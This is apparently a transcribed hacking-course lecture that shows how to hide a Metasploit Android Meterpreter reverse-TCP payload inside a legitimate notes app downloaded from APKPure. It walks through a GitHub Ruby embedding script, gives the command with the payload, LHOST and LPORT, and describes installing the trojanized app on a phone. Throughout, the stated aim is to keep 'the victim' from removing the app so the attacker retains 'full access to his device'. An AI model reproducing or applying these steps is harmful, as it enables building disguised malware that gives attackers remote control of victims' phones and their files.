We saw in a previous lecture how we can create a fake app that include a payload and how to send it to the victim. And once the victim installs this fake app to his Android device, we will get full access to his device. Now the only problem with this technique that the app is doing nothing, is a useless app. So if the victim receives such app and install it and it's not doing anything, most probably he will remove it, even if he's not suspecting that this is a malicious app. So what we'll be doing in this lecture, I'm going to show you how to bind a real app with a fake app that include a payload, or actually how to include a payload inside a real app. All the steps that allow you to do that, I wrote them in a file which I will include to the lecture. So you can download this file that explains the step by step how to do that. Now, in general, you will see that there is different scripts that allow you to do that. And you can use the script that I choose, or you can search online for another script, but you will find many scripts that is doing that. So first, what we need to do, we need to get a real app. So to be able to do that, you just can Google it. Or if you are aware of any website from where you can download real app, you can do that as well. So I'm gonna try to download notes.apk or any games or anything. You will find many websites that allow you to download a free app. This is one of them. Those are regular app which you can really download, like APK Pure. It's a big website that allow you to download free APK, and you can choose this one or search for any app or any game. So this will be the app where we will include the malicious app. So I click on download. Sorry, we will include the payload inside. And this is the app, and I'm going to click on OK. And once the app has been downloaded, it will show inside the download folder. So let's go there. And let's go to download. And the app should be here. Notes. Yeah, this is one. Now I'm going to copy it. And I need to create a folder. I'm going to create a new folder. And I'm going to name it anything like 1, 2, 3, where I will add this app inside. Here you go. Now for simplicity, because we will be using the command line for doing that, for simplicity, it's better to rename it to an easier name instead of having all this full name. You can keep the name or you can rename it. It will not change anything. So I will rename it, and I'm going to name this app Notes. Okay, and click on rename. Now going to a terminal. Here you go. This is my terminal, and let's go to the folder that we just created, 1, 2, 3, and let's check the app is there. Excellent. So sorry. Then the next step will be to download the script that we will need to use for binding the app with the payload. Now the script name is Metasploit APK embedded payload. So if you take that and search on Google for this specific script, we just increase the screen. Getting back. Okay, and let's paste it here. Paste. And usually this specific script, or most of those scripts are located in a folder or in a website called GitHub. So GitHub is from where you can get many scripts that help you. It's a big library actually for doing different kind of attack. So this is a script, as you can see, and you can go and download it. Download as a zip, and once the script is downloaded, and it will be downloaded to the same location actually. So let's get back to download folder. Getting back to the download folder. Here you go. And this is the script. As you can see, I'm gonna also copy it and add it to my home folder inside 123 where I will be, and paste. Excellent. Now, so getting to the command line, let's check that the file is there. In general, this is actually a compressed file because it's like a zip file, like Windows. In general, to be able to uncompress any zip file, you just use the command unzip and the file name. It will unzip and the file name. You don't need to write the full name, just the metasploit. And here you go, and it has been unzipped. Let me clear my screen, and let's ls. So as you can see, I have the file and I have the folder. Now, going into the folder that we just created, metasploit and list, you will find another folder under the name of v2. Going inside this folder, because this is where the program that you're gonna need to to bind the payload inside the application. So if we check ls, yes, this is the file apk.embed.payload. I'm gonna need to use this specific file. Now, to be able to do the binding feature, what I need to do is I need to move this node inside the same folder. Instead of using the copy command and using a lot of syntax, let's do that manually. Through the graphically. So going here, home 123. Let's take a copy from this one, and we're gonna put it inside the metasploit v02, and let's add it here. So now I have the program and the file in the same folder. It doesn't matter where. The point is you should have the program and the file inside the same folder. Now let's run the program. Now, for any file that end up with RB, that means it's a Ruby file. Ruby is a language. So to be able to launch, to run this program, you need to start by typing Ruby and the file name. Ruby and the file name is AP, and if you put tab, it will continue the file. Then you put the app name, notes.apk. Then you type -p. -p means I need for inside this file to bind a payload. And you put the payload. The payload that we will be using will be Android. It's the same payload that we used in the lecture where we created the fake payload. Android/meter operator /reverse underscore TCP. Oh, sorry. Think I deleted. Sorry. Let me clear the screen because it seems that accidentally I clear. And let me repeat the command one more time. Ruby and then AP tab. Then the file name, which is note, and then tab. And then -p mean I need to bind a payload inside this file. And I will use the payload that I used in the previous scenario, Android meter reader reverse verse underscore. The full command are written inside the files that will attach to the lecture, so you don't need to memorize anything. TCP. Then minus L, where in minus L you need to put, I'm sorry, not minus L, L host. In L host, you need to type the IP of the Kali Linux machine, which in my case is 192.168.1. Oh man, keep doing this mistake. I'm so sorry. The numlock is closed, so that's why. Whenever I click on any number, it will return to the previous comment. Ruby APK, and then the file name notes APK -p Android then meter operator reverse TCP. Then we need to type the IP, so lhost equal 192.168.1.103 and L port equal 44. 1, 2, 3, 4. Now feel free to choose any port. You can choose 444 or you can choose 443 or 4, whatever port you want you can use, because this port will be opened on your Kali Linux machine to accept the connection. So this is the IP of my Kali machine and this is the port of my Kali machine as well. And then you click on enter, and as you can see he will bind those two files together. This may take few minutes, so let me pause the video until everything is set, and then I'm going to show you that the application has been binded with a payload. I received an error. It seems that the payload that I choose was not right, so it's better to take it from here, or let me repeat it one more time. So it seems that the payload itself, it's not right. Yeah, okay, that's it. It's because I forgot to put / Android interpreter. And let's do it again. And let's pause one more time. As you can see, it has been created with a different name. It's node_embedded APK, and it should be on the same location. So let me just close that. And here is the new app. And if I take this app and copy it to the Android device and run it, you're going to see that it's a regular app, but it has a payload inside. So let me copy it here. If you don't know how to drag and drop file between Linux and Windows, I already explained that in a previous lecture. So let me just open the Android device, MP3, and this is the file. I'm going to put it here. And this is Mobizane, so let's see. Here you go. And this is the app. And it's a regular notepad, but notice that when I try to install this application on my device, it's asking me to get permission to get access to my file, my document, my picture, everything. And this is not normal. I mean, if you install the regular one, he will not request for all those permission. So by doing that, once you install it, it will access your Kali Linux machine, but do not forget to run the handler as we did on the previous attack.